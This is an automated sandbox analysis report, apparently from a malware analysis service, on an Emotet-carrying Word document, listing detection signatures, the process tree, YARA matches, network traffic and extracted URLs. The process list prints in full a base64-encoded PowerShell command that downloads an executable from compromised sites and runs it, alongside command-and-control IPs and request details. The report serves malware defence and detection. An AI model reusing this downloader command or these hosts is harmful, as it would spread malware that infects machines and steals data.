
Analysis Report SecuriteInfo.com.Exploit.Siggen2.12119.17670.7154

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen2.12119.17670.7154 (renamed file extension from 7154 to doc)
Analysis ID: 255756
MD5: 1e522cb3efd6b827ac682b262c9e26a3
SHA1: d444e2e6ecf2f973e82c016dbbc6601d1b6c547c
SHA256: ea1d07ae55467195b610358c91f9d4cb4f280d055e9a86158339ca3bdba8ca15


Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
PowerShell case anomaly found
Very long command line found
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6724 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • svchost.exe (PID: 6904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • powershell.exe (PID: 6980 cmdline: powersheLL -e JABSAFcAVQBIAE8AYQBxAHQAPQAnAFoAVwBSAEcAVwBiAHQAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIAaQB0AGAAeQBgAFAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAQgBJAFIAUwBCAHEAeQBnACAAPQAgACcANAA2ADMAJwA7ACQARgBKAEkATgBFAGoAaQBkAD0AJwBUAEYARwBEAEIAbAB2AGMAJwA7ACQASgBCAFIAVQBGAGUAcwBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABCAEkAUgBTAEIAcQB5AGcAKwAnAC4AZQB4AGUAJwA7ACQAQwBNAFEARABMAG0AcwBzAD0AJwBWAE0AUABaAEMAZQBjAGIAJwA7ACQAWgBaAFYASgBBAHYAagBuAD0AJgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAVAAuAHcAZQBiAGMAbABpAGUATgBUADsAJABaAE8ATgBGAFQAcgBqAGwAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBsAGkAYgByAGUAcgBvAC4AeAB5AHoALwBTAGMAcgBpAHAAdABzAC8AMwB5AF8AbQAwAGMAYgBlAF8AbABwAGcAbwBqADcAegAvACoAaAB0AHQAcABzADoALwAvAHMAYwBvAGUAbgB1AGcAYQBuAGQAYQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AawBfAGYAaABzAHYAYwBfAHcAbgBpADIAegB4AHoAcgBjAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHUAbgBuAHIAaQB0AGUAcABsAHUAbQBiAGkAbgBnAC4AYwBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AMQAyAHgAXwBqAGEAYQBxAF8AbwAzAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbgBhAGoAYwBvAHMAbQBlAHQAaQBjAHMALgBjAG8AbQAvAGkAbQBnAC8AaAB2AGcAbAB2AF8AaABhAHkAXwAzADUAcwBhAGMAbwBkAGcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBvAHgAYQBoAGEAdQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBkADgAdABlAGIAXwBuADAAdgAwAGgAXwBkAG0AMAB1AHkAbwBrAC8AJwAuACIAcwBQAGAAbABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABKAEkAUABYAEcAeAB2AGEAPQAnAFMAVABQAFYAQQB6AGwAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBIAFgAQwBIAHAAbgB5ACAAaQBuACAAJABaAE8ATgBGAFQAcgBqAGwAKQB7AHQAcgB5AHsAJABaAFoAVgBKAEEAdgBqAG4ALgAiAGQAbwBgAHcATgBMAGAATwBBAEQARgBpAGAAbABlACIAKAAkAE0ASABYAEMASABwAG4AeQAsACAAJABKAEIAUgBVAEYAZQBzAG8AKQA7ACQARwBCAFgAVgBVAG0AdABtAD0AJwBGAFUARABDAEIAYQBxAG0AJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABKAEIAUgBVAEYAZQBzAG8AKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAzADQAOAA1ADAAKQAgAHsAKABbAHcAbQB
pAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAYABSAGAARQBhAHQAZQAiACgAJABKAEIAUgBVAEYAZQBzAG8AKQA7ACQARgBGAFQASQBMAGEAYQB5AD0AJwBaAEwAUQBPAEYAZgB2AHoAJwA7AGIAcgBlAGEAawA7ACQATgBPAEMARABVAGcAcABnAD0AJwBRAFIAUABGAE8AZwBzAHIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQBTAE0AVgBVAG4AdABtAD0AJwBQAEcAWABXAEYAYQBzAHoAJwA= MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 240 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6332 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6340 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6268 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 3492 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6096 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5280 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5928 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5784 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\20200802\PowerShell_transcript.767316.L3ypsoUw.20200802010517.txt | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | (string matches listed below)
  • 0x23:$s1: PowerShell
  • 0xfd:$s1: powersheLL
  • 0x107f:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0x107f:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0x107f:$sn3: PowerShell
  • 0xff:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.767316.L3ypsoUw.20200802010517.txt | JoeSecurity_EmotetDownloader | Yara detected Emotet Downloader | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.525602503.0000000002281000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000007.00000002.525557735.0000000002270000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000006.00000002.279192732.00000000021E1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000006.00000002.278901270.0000000000730000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exe | Code function: 7_2_02281D9C CryptDecodeObjectEx,7_2_02281D9C
Source: C:\Users\user\463.exe | Code function: 6_2_0042645E FindFirstFileA,FindClose,6_2_0042645E
Source: C:\Users\user\463.exe | Code function: 6_2_00401770 FindFirstFileA,FindClose,6_2_00401770
Source: C:\Users\user\463.exe | Code function: 6_2_004018B0 FindFirstFileA,FindNextFileA,FindClose,6_2_004018B0
Source: C:\Users\user\463.exe | Code function: 6_2_00425B9E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,6_2_00425B9E
Source: C:\Users\user\463.exe | Code function: 6_2_00401BB0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,6_2_00401BB0
Source: C:\Users\user\463.exe | Code function: 6_2_021E28BC FindNextFileW,FindFirstFileW,FindClose,6_2_021E28BC
Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exe | Code function: 7_2_0042645E FindFirstFileA,FindClose,7_2_0042645E
Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exe | Code function: 7_2_00401770 FindFirstFileA,FindClose,7_2_00401770
Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exe | Code function: 7_2_004018B0 FindFirstFileA,FindNextFileA,FindClose,7_2_004018B0
Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exe | Code function: 7_2_00425B9E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,7_2_00425B9E
Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exe | Code function: 7_2_00401BB0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,7_2_00401BB0
Source: C:\Windows\SysWOW64\apprepapi\Windows.ApplicationModel.Background.TimeBroker.exe | Code function: 7_2_022828BC FindNextFileW,FindFirstFileW,FindClose,7_2_022828BC
Source: winword.exe | Memory has grown: Private usage: 0MB later: 65MB
Source: global traffic | DNS query: name: www.librero.xyz
Source: global traffic | TCP traffic: 192.168.2.3:49725 -> 138.128.181.122:443
Source: global traffic | TCP traffic: 192.168.2.3:49724 -> 65.99.252.93:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.3:49728 -> 142.105.151.124:443
Source: global traffic | HTTP traffic detected: GET /Scripts/3y_m0cbe_lpgoj7z/ HTTP/1.1 | Host: www.librero.xyz | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1 | Host: www.librero.xyz
Source: global traffic | HTTP traffic detected: POST /bYtJY/mGgMu83T0/ HTTP/1.1 | Referer: http://142.105.151.124/bYtJY/mGgMu83T0/ | Content-Type: multipart/form-data; boundary=---------------------------010163079471474 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 142.105.151.124:443 | Content-Length: 4612 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 142.105.151.124
Source: unknown | DNS traffic detected: queries for: www.librero.xyz
Source: unknown | HTTP traffic detected: POST /bYtJY/mGgMu83T0/ HTTP/1.1 | Referer: http://142.105.151.124/bYtJY/mGgMu83T0/ | Content-Type: multipart/form-data; boundary=---------------------------010163079471474 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 142.105.151.124:443 | Content-Length: 4612 | Connection: Keep-Alive | Cache-Control: no-cache
Source: Windows.ApplicationModel.Background.TimeBroker.exe, 00000007.00000002.526270542.00000000026B2000.00000004.00000001.sdmp | String found in binary or memory: http://142.105.151.124/bYtJY/mGgMu83T0/
Source: Windows.ApplicationModel.Background.TimeBroker.exe, 00000007.00000002.526270542.00000000026B2000.00000004.00000001.sdmp | String found in binary or memory: http://142.105.151.124:443/bYtJY/mGgMu83T0/
Source: Windows.ApplicationModel.Background.TimeBroker.exe, 00000007.00000002.526270542.00000000026B2000.00000004.00000001.sdmp | String found in binary or memory: http://142.105.151.124:443/bYtJY/mGgMu83T0/c
Source: svchost.exe, 00000001.00000002.527538433.0000019ABF80E000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsoft.
Source: svchost.exe, 00000001.00000002.527538433.0000019ABF80E000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.480281699.000001E301671000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: svchost.exe, 00000001.00000002.527538433.0000019ABF80E000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.480281699.000001E301671000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000001.00000002.527538433.0000019ABF80E000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.480265286.000001E301657000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: svchost.exe, 00000001.00000002.527896283.0000019ABFA30000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: svchost.exe, 00000009.00000002.304026739.0000021A4FC13000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: PowerShell_transcript.767316.L3ypsoUw.20200802010517.txt.2.dr | String found in binary or memory: http://www.librero.xyz/Scripts/3y_m0cbe_lpgoj7z/
Source: PowerShell_transcript.767316.L3ypsoUw.20200802010517.txt.2.dr | String found in binary or memory: http://www.najcosmetics.com/img/hvglv_hay_35sacodg/
Source: PowerShell_transcript.767316.L3ypsoUw.20200802010517.txt.2.dr | String found in binary or memory: http://www.oxahaus.com/wp-admin/d8teb_n0v0h_dm0uyok/
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://api.aadrm.com/
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://api.onedrive.com
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://app.powerbi.com/taskpane.html
Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://augloop.office.com
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://cdn.entity.
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://clients.config.office.net/
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://config.edge.skype.com
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://cortana.ai
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://cr.office.com
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: svchost.exe, 00000009.00000003.303196281.0000021A4FC49000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000009.00000002.304091742.0000021A4FC3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000002.304110794.0000021A4FC52000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
            Source: svchost.exe, 00000009.00000002.304091742.0000021A4FC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
            Source: svchost.exe, 00000009.00000003.303245112.0000021A4FC41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
            Source: svchost.exe, 00000009.00000003.303245112.0000021A4FC41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
            Source: svchost.exe, 00000009.00000003.303228259.0000021A4FC40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://devnull.onenote.com
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://directory.services.
            Source: svchost.exe, 00000009.00000003.303196281.0000021A4FC49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000009.00000002.304124150.0000021A4FC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000009.00000002.304124150.0000021A4FC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000009.00000002.304110794.0000021A4FC52000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.303196281.0000021A4FC49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000009.00000002.304091742.0000021A4FC3D000.00